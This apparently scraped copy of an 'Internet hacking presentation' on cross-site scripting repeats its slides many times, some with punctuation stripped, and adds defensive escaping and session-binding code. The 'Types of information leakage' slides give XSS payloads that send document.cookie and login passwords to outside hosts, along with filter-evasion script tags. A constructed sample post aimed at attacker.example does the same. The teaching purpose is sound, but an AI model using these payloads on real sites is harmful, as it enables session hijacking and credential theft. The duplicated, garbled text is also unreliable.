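    def active_sessions(self) -> int:
        return len(self._sessions)


if __name__ == "__main__":
    store = SessionStore(ttl_seconds=60)
    sid = store.login("alice", "203.0.113.5", now=1000.0)  # constructed address
    print("same address:", store.lookup(sid, "203.0.113.5", now=1010.0))
    print("other address:", store.lookup(sid, "198.51.100.9", now=1020.0))
    print("same address after revocation:", store.lookup(sid, "203.0.113.5", now=1030.0))
```

Binding to the client IP breaks for users whose address changes mid-session (mobile networks, proxies, large NATs) and does nothing to stop a script from reading the cookie in the first place, which is what marking the cookie HttpOnly addresses.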

31

Disabling Scripts…

Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis.

Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effective…

Problems with this… Substantial reduction in functionality and responsiveness. Many sites do not work without client-side scripting, forcing users to disable protection for that site and opening their systems to the threat.

32

The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content

33

For explanation purposes

Remember the syntax…

34

SYNTAX: script injection in an image src tag

• Embed nested quotes: ' or " or \u0022 \u0027

• Keyword filters that allow any js to execute are useless: A = 'navi'; B = 'gator.userAgent'; alert(eval(A+B))

• Limited input length + script block embed = unlimited script power (script src=)

• SSL pages warn if script src comes from an untrusted site, but if you can upload, say, an img that is actually js commands…

• Methods of script encoding:

<img src="vbscript:do63ument.lo63ation=http://ab.com">

<IMG SRC="javascript:alert('test')">

<IMG SRC="javasc ript:alert('test')">

35

Types of information leakage

Client can reveal cookies to a 3rd party (session state, order info, etc.):

http://host/a.php?variable="><script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?'%20+document.cookie</script>

Client can reveal posted form items to a 3rd party (userID/passwd, etc.):

<form> action="logoninformation.jsp" method="post" onsubmit="hackImg=new Image; hackImg.src='http://www.malicioussite.com/'+document.forms(1).login.value+':'+document.forms(1).password.value;" </form>

Client can be tricked into accessing/posting spoofed info to a trusted server:

www.trustedserver.com/xss.asp?name = <iframe src=http://www.trustedserver.com/auth_area/orderupdate?items=4000></iframe>

36

YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES

1. http://www.cgisecurity.com/archive/php/phpNuke_cross_site_scripting.txt

2. http://www.cgisecurity.com/archive/php/phpNuke_CSS_5_holes.txt

3. http://www.cgisecurity.com/archive/php/phpNuke_2_more_CSS_holes.txt

37

Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]

Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]

Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application

  • Slide 1
  • Dynamic content
  • Slide 3
  • Cross Site Scripting
  • Slide 5
  • Causes
  • Threats helliphelliphelliphelliphellip
  • How it is performed
  • Slide 9
  • Slide 10
  • Slide 11
  • Persistenthellip
  • Slide 13
  • Scripting Via Malicious Linkhellip
  • In this scenario the attacker sends a specially crafted e-mai
  • Slide 16
  • If any part of the Web site uses cookies then it may be possib
  • Sending an Unauthorized Request
  • In this scenario the user unknowingly executes scripts written
  • By Scripting
  • Slide 21
  • Some FACTS about the XSS attackshelliphelliphellip
  • By SURVEYhelliphelliphellip
  • Slide 24
  • Dynamic XSS with 2way comms
  • Slide 26
  • Slide 27
  • Slide 28
  • Filtering
  • Cookie Security
  • Disabling Scriptshellip
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
Page 10: Internet hacking presentation

10

Types of XSS Attacks

11

Non-Persistent

bull It is the most common type These holes show up when the data is provided by a web client most commonly in HTTP query parameters or in HTML form submissions is used immediately by server-side scripts to generate a page of results for that user without properly sanitizing the responsebull Because HTML documents have a flat serial structure that mixes control statements formatting and the actual content any non-validated user-supplied data included in the resulting page without proper HTML encoding may lead to markup injection

12

Persistenthellip

The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw it occurs when the data provided by the attacker is saved by the server and then permanently displayed on normal pages returned to other users in the course of regular browsing without proper HTML escaping A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read

13

Examples of attackshelliphelliphellip

14

Scripting Via Malicious Linkhellip

15

In this scenario the attacker sends a specially crafted e-mail message to a victim containing malicious link scripting likeltA HREF=httplegitimateSitecomregistrationcgiclientprofile=ltSCRIPTgtmalicious codeltSCRIPTgtgtClick hereltAgtWhen a user clicks on this link the URL is sent to site name including the malicious code If the legitimate server sends a page back to the user including the value of clientprofile the malicious code will be executed on the client Web browser

16

Stealing Userrsquos COOKIEhellip

17

If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs

18

Sending an Unauthorized Request

19

In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server

20

By Scripting

21

Script can read all HTML contenttags in other window

Script can setdelete tagscontent in other window We can read and set form values then run a submit()

Script can set vars and call functions in other window

Documentwrite can allow script to create new tagscontent in other window

This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain

If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors

22

Some FACTS about the XSS attackshelliphelliphellip

23

By SURVEYhelliphelliphellip

1st Gen XSS was against public sites and ran against everyone that visited site

2nd Gen XSS focused on sites that allow self-reflection XSS

24

bull Cross-site scripting attacks are a special case of code injection

bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007

bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data

Dynamic XSS with 2way commsVictim Browser

XSS against site

IFRAME

Script commands run here

Other documents on site loaded into here

ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt

XSS Vulnerable Server

Attacker System

New jscripthellip

ltscript src=ldquoattackercomrdquogt

26

Some prominent sites that have been affected in the past arehelliphellip

The search engine Google The email services of Google and

Yahoo The social networking sites Facebook

MySpace and Orkut The developers of MediaWiki have

fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users

Researchers have claimed that as many as 68 of websites are likely open to XSS attacks

27

By seeing all this the question that arises ishelliphellip

Then how can we prevent it

28

Yes some methods are there for

prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption

29

Filtering

One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner

30

Cookie Security

Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie

31

Disabling Scriptshellip

Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis

Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip

Prblms wid thishellip Substantial reduction in functionality and

responsiveness Many sites do not work without client-side

scripting forcing users to disable protection for that site and opening their systems to the threat

32

The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content

33

For explaining Purpose

Remember the syntaxhellip

34

SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt

35

Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)

httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt

Client can reveal posted form items to 3rd party (userIDpasswd etc)

ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt

Client can be tricked into accessingposting spoofed info to trusted server

wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt

36

YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES

1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt

2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt

3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt

37

Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]

Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]

Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application

  • Slide 1
  • Dynamic content
  • Slide 3
  • Cross Site Scripting
  • Slide 5
  • Causes
  • Threats helliphelliphelliphelliphellip
  • How it is performed
  • Slide 9
  • Slide 10
  • Slide 11
  • Persistenthellip
  • Slide 13
  • Scripting Via Malicious Linkhellip
  • In this scenario the attacker sends a specially crafted e-mai
  • Slide 16
  • If any part of the Web site uses cookies then it may be possib
  • Sending an Unauthorized Request
  • In this scenario the user unknowingly executes scripts written
  • By Scripting
  • Slide 21
  • Some FACTS about the XSS attackshelliphelliphellip
  • By SURVEYhelliphelliphellip
  • Slide 24
  • Dynamic XSS with 2way comms
  • Slide 26
  • Slide 27
  • Slide 28
  • Filtering
  • Cookie Security
  • Disabling Scriptshellip
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
Page 11: Internet hacking presentation

11

Non-Persistent

bull It is the most common type These holes show up when the data is provided by a web client most commonly in HTTP query parameters or in HTML form submissions is used immediately by server-side scripts to generate a page of results for that user without properly sanitizing the responsebull Because HTML documents have a flat serial structure that mixes control statements formatting and the actual content any non-validated user-supplied data included in the resulting page without proper HTML encoding may lead to markup injection

12

Persistenthellip

The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw it occurs when the data provided by the attacker is saved by the server and then permanently displayed on normal pages returned to other users in the course of regular browsing without proper HTML escaping A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read

13

Examples of attackshelliphelliphellip

14

Scripting Via Malicious Linkhellip

15

In this scenario the attacker sends a specially crafted e-mail message to a victim containing malicious link scripting likeltA HREF=httplegitimateSitecomregistrationcgiclientprofile=ltSCRIPTgtmalicious codeltSCRIPTgtgtClick hereltAgtWhen a user clicks on this link the URL is sent to site name including the malicious code If the legitimate server sends a page back to the user including the value of clientprofile the malicious code will be executed on the client Web browser

16

Stealing Userrsquos COOKIEhellip

17

If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs

18

Sending an Unauthorized Request

19

In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server

20

By Scripting

21

Script can read all HTML contenttags in other window

Script can setdelete tagscontent in other window We can read and set form values then run a submit()

Script can set vars and call functions in other window

Documentwrite can allow script to create new tagscontent in other window

This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain

If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors

22

Some FACTS about the XSS attackshelliphelliphellip

23

By SURVEYhelliphelliphellip

1st Gen XSS was against public sites and ran against everyone that visited site

2nd Gen XSS focused on sites that allow self-reflection XSS

24

bull Cross-site scripting attacks are a special case of code injection

bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007

bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data

Dynamic XSS with 2way commsVictim Browser

XSS against site

IFRAME

Script commands run here

Other documents on site loaded into here

ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt

XSS Vulnerable Server

Attacker System

New jscripthellip

ltscript src=ldquoattackercomrdquogt

26

Some prominent sites that have been affected in the past arehelliphellip

The search engine Google The email services of Google and

Yahoo The social networking sites Facebook

MySpace and Orkut The developers of MediaWiki have

fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users

Researchers have claimed that as many as 68 of websites are likely open to XSS attacks

27

By seeing all this the question that arises ishelliphellip

Then how can we prevent it

28

Yes some methods are there for

prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption

29

Filtering

One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner

30

Cookie Security

Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie

31

Disabling Scriptshellip

Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis

Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip

Prblms wid thishellip Substantial reduction in functionality and

responsiveness Many sites do not work without client-side

scripting forcing users to disable protection for that site and opening their systems to the threat

32

The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content

33

For explaining Purpose

Remember the syntaxhellip

34

SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt

35

Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)

httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt

Client can reveal posted form items to 3rd party (userIDpasswd etc)

ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt

Client can be tricked into accessingposting spoofed info to trusted server

wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt

36

YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES

1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt

2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt

3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt

37

Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]

Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]

Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application

  • Slide 1
  • Dynamic content
  • Slide 3
  • Cross Site Scripting
  • Slide 5
  • Causes
  • Threats helliphelliphelliphelliphellip
  • How it is performed
  • Slide 9
  • Slide 10
  • Slide 11
  • Persistenthellip
  • Slide 13
  • Scripting Via Malicious Linkhellip
  • In this scenario the attacker sends a specially crafted e-mai
  • Slide 16
  • If any part of the Web site uses cookies then it may be possib
  • Sending an Unauthorized Request
  • In this scenario the user unknowingly executes scripts written
  • By Scripting
  • Slide 21
  • Some FACTS about the XSS attackshelliphelliphellip
  • By SURVEYhelliphelliphellip
  • Slide 24
  • Dynamic XSS with 2way comms
  • Slide 26
  • Slide 27
  • Slide 28
  • Filtering
  • Cookie Security
  • Disabling Scriptshellip
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
Page 12: Internet hacking presentation

12

Persistenthellip

The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw it occurs when the data provided by the attacker is saved by the server and then permanently displayed on normal pages returned to other users in the course of regular browsing without proper HTML escaping A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read

13

Examples of attackshelliphelliphellip

14

Scripting Via Malicious Linkhellip

15

In this scenario the attacker sends a specially crafted e-mail message to a victim containing malicious link scripting likeltA HREF=httplegitimateSitecomregistrationcgiclientprofile=ltSCRIPTgtmalicious codeltSCRIPTgtgtClick hereltAgtWhen a user clicks on this link the URL is sent to site name including the malicious code If the legitimate server sends a page back to the user including the value of clientprofile the malicious code will be executed on the client Web browser

16

Stealing Userrsquos COOKIEhellip

17

If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs

18

Sending an Unauthorized Request

19

In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message. Because the malicious scripts are executed in a context that appears to have originated from the legitimate server, the attacker has full access to the document retrieved and may send data contained in the page back to their site. If the embedded script code has additional interaction capability with the legitimate server without alerting the victim, the attacker could develop and exploit that posted data to a different page on the legitimate Web server.

20

By Scripting

21

Script can read all HTML content/tags in the other window.

Script can set/delete tags/content in the other window. We can read and set form values, then run a submit().

Script can set vars and call functions in the other window.

Document.write can allow script to create new tags/content in the other window.

This means that a script can read all HTML contents of a document, change the appearance of the document, modify existing tags and values, modify and submit forms. We have full control of the other window as long as it's in the same document.domain.

If we can forward cookies, then we can also forward other jscript-accessible content to an attacker. We can forward page contents, form values (including hidden…), jscript vars/state, jscript errors.

22

Some FACTS about the XSS attacks……

23

By SURVEY……

1st Gen XSS was against public sites and ran against everyone that visited the site.

2nd Gen XSS focused on sites that allow self-reflection XSS.

24

• Cross-site scripting attacks are a special case of code injection.

• Cross-site scripting carried out on websites were roughly 80% of all security vulnerabilities documented by Symantec as of 2007.

• Their impact may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data.

Dynamic XSS with 2-way comms (diagram): Victim Browser, XSS Vulnerable Server, Attacker System. The XSS against the site loads an IFRAME in the victim browser; script commands run there, and other documents on the site are loaded into it. <script src="attacker.com/innerHTML_of_IFRAME"> carries the IFRAME contents to the Attacker System, which sends new jscript… back via <script src="attacker.com">.

26

Some prominent sites that have been affected in the past are……

The search engine Google; the email services of Google and Yahoo; the social networking sites Facebook, MySpace and Orkut. The developers of MediaWiki have fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users.

Researchers have claimed that as many as 68% of websites are likely open to XSS attacks.

27

By seeing all this, the question that arises is……

Then how can we prevent it?

28

Yes, there are some methods for prevention, and those are: Filtering, Cookie Security, Disabling Scripts, Encryption.

29

Filtering

One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields, or to escape all untrusted data using a method appropriate for the output context. There are several different escaping schemes that must be used depending on where the untrusted string needs to be placed, including HTML numeric entity encoding, JavaScript escaping, CSS escaping and URL encoding. Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner.
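The context-dependent escaping this slide describes, applied to the message-board posts of the Persistent slide, as an added example that is not code from the presentation. The field names, the "#" placeholder href, the hex-colour allow-list and the sample post are this example's own assumptions.

```javascript
// Added example, not code from the presentation: output escaping chosen by
// context, as the "Filtering" slide describes, applied to the stored
// message-board posts of the "Persistent" slide. The sample post is constructed.

// HTML text and quoted-attribute context: numeric entity encoding of every
// character that could end the text node or the attribute value.
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"'`\/=]/g,
    (ch) => `&#${ch.charCodeAt(0)};`);
}

// JavaScript string-literal context: \xHH / \uHHHH encode everything that is
// not alphanumeric, so quotes, line terminators and "</script>" cannot close
// the literal or the script element.
function escapeJsString(untrusted) {
  return String(untrusted).replace(/[^A-Za-z0-9]/g, (ch) => {
    const code = ch.charCodeAt(0);
    return code < 256
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// URL query-parameter context: percent-encode the parameter value only.
function escapeUrlParam(untrusted) {
  return encodeURIComponent(String(untrusted));
}

// A whole URL supplied by a user (href/src) cannot be made safe by escaping:
// validate the scheme instead. The WHATWG URL parser strips tabs and newlines,
// so an obfuscation such as "java\tscript:" still resolves to the javascript
// scheme and is rejected; a scheme containing a space fails to parse and is
// rejected too. Returns "#" (an assumed placeholder) for anything not http(s).
function safeHref(untrusted) {
  try {
    const u = new URL(String(untrusted));
    return (u.protocol === 'http:' || u.protocol === 'https:') ? u.href : '#';
  } catch (_) {
    return '#';
  }
}

// CSS context: escaping alone is not enough (escaped characters still form
// identifiers), so accept only a strict allow-list: a six-digit hex colour.
function isValidHexColor(value) {
  return /^#[0-9a-fA-F]{6}$/.test(String(value));
}

// Usernames have a known shape: reject anything else up front.
function isValidUsername(value) {
  return /^[A-Za-z0-9_]{3,32}$/.test(String(value));
}

// Render one stored post, passing each untrusted field through the escaper
// for the context it lands in. Field names are this example's own.
function renderPost(post) {
  const author = isValidUsername(post.author) ? post.author : 'anonymous';
  const color = isValidHexColor(post.color) ? post.color : '#000000';
  return [
    `<div class="post" data-author="${escapeHtml(author)}">`,
    `  <a href="/users?name=${escapeUrlParam(author)}">${escapeHtml(author)}</a>`,
    `  <a href="${escapeHtml(safeHref(post.homepage))}">homepage</a>`,
    `  <p style="color: ${color}">${escapeHtml(post.body)}</p>`,
    `  <script>var authorName = '${escapeJsString(author)}';</script>`,
    `</div>`,
  ].join('\n');
}

// Constructed sample: a post carrying a cookie-exfiltration payload of the
// kind quoted on the "Types of information leakage" slide, a CSS value that
// tries to smuggle a URL, and a javascript: homepage URL.
const SAMPLE_POST = {
  author: 'mallory',
  color: 'red; background: url(javascript:alert(1))',
  homepage: "javascript:alert('test')",
  body: '"><script>document.location=\'http://attacker.example/c?\'+document.cookie</script>',
};
```

Rendering SAMPLE_POST leaves the payload as inert entity-encoded text, the homepage link as "#", and the colour at the default.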

30

Cookie Security

Many web applications rely on session cookies for authentication between individual HTTP requests, and because client-side scripts generally have access to these cookies, simple XSS exploits can steal these cookies. To mitigate this particular threat, many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie.

31

Disabling Scripts…

Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis.

Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effective…

Problems with this…: substantial reduction in functionality and responsiveness. Many sites do not work without client-side scripting, forcing users to disable protection for that site and opening their systems to the threat.

32

The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content

33

For explaining purposes,

remember the syntax…

34

SYNTAX: script injection in an image src tag
• Embed nested quotes
• ' or " or \u0022 \u0027
• Keyword filters that allow any js to execute are useless
• A = 'navi'; B = 'gator.userAgent'; alert(eval(A+B))
• Limited input length + script block embed = unlimited script power (script src=)
• SSL pages warn if script src comes from an untrusted site
• but if you can upload, say, an img that is actually js commands
• methods of script encoding
• <img src="vbscript:do%63ument.lo%63ation='http://ab.com'">
• <IMG SRC="javascript:alert('test')">
• <IMG SRC="javasc ript:alert('test')">

35

Types of information leakage: Client can reveal cookies to a 3rd party (session state, order info, etc.)

http://host/a.php?variable="><script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?'%20+document.cookie</script>

Client can reveal posted form items to a 3rd party (userID/passwd, etc.)

<form> action="logoninformation.jsp" method="post" onsubmit="hackImg=new Image; hackImg.src='http://www.malicioussite.com/'+document.forms(1).login.value+':'+document.forms(1).password.value;" </form>

Client can be tricked into accessing/posting spoofed info to a trusted server

www.trustedserver.com/xss.asp?name = <iframe src=http://www.trustedserver.com/auth_area/order_update?items=4000></iframe>

36

YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES

1. http://www.cgisecurity.com/archive/php/phpNuke_cross_site_scripting.txt

2. http://www.cgisecurity.com/archive/php/phpNuke_CSS_5_holes.txt

3. http://www.cgisecurity.com/archive/php/phpNuke_2_more_CSS_holes.txt

37

Related vulnerabilities

Several classes of vulnerabilities or attack techniques are related to XSS. Cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege.[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on the HTTP protocol level (in addition to enabling attacks such as HTTP response splitting).[32]

Cross-site request forgery (CSRF/XSRF) is almost the opposite of XSS, in that rather than exploiting the user's trust in a site, the attacker (and his malicious page) exploits the site's trust in the client software, submitting requests that the site believes represent conscious and intentional actions of authenticated users.[33]

Lastly, SQL injection exploits a vulnerability in the database layer of an application. When user input is incorrectly filtered, any SQL statements can be executed by the application.

Page 15: Internet hacking presentation

15

In this scenario the attacker sends a specially crafted e-mail message to a victim containing malicious link scripting likeltA HREF=httplegitimateSitecomregistrationcgiclientprofile=ltSCRIPTgtmalicious codeltSCRIPTgtgtClick hereltAgtWhen a user clicks on this link the URL is sent to site name including the malicious code If the legitimate server sends a page back to the user including the value of clientprofile the malicious code will be executed on the client Web browser

16

Stealing Userrsquos COOKIEhellip

17

If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs

18

Sending an Unauthorized Request

19

In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server

20

By Scripting

21

Script can read all HTML contenttags in other window

Script can setdelete tagscontent in other window We can read and set form values then run a submit()

Script can set vars and call functions in other window

Documentwrite can allow script to create new tagscontent in other window

This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain

If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors

22

Some FACTS about the XSS attackshelliphelliphellip

23

By SURVEYhelliphelliphellip

1st Gen XSS was against public sites and ran against everyone that visited site

2nd Gen XSS focused on sites that allow self-reflection XSS

24

bull Cross-site scripting attacks are a special case of code injection

bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007

bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data

Dynamic XSS with 2way commsVictim Browser

XSS against site

IFRAME

Script commands run here

Other documents on site loaded into here

ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt

XSS Vulnerable Server

Attacker System

New jscripthellip

ltscript src=ldquoattackercomrdquogt

26

Some prominent sites that have been affected in the past arehelliphellip

The search engine Google The email services of Google and

Yahoo The social networking sites Facebook

MySpace and Orkut The developers of MediaWiki have

fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users

Researchers have claimed that as many as 68 of websites are likely open to XSS attacks

27

By seeing all this the question that arises ishelliphellip

Then how can we prevent it

28

Yes some methods are there for

prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption

29

Filtering

One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner

30

Cookie Security

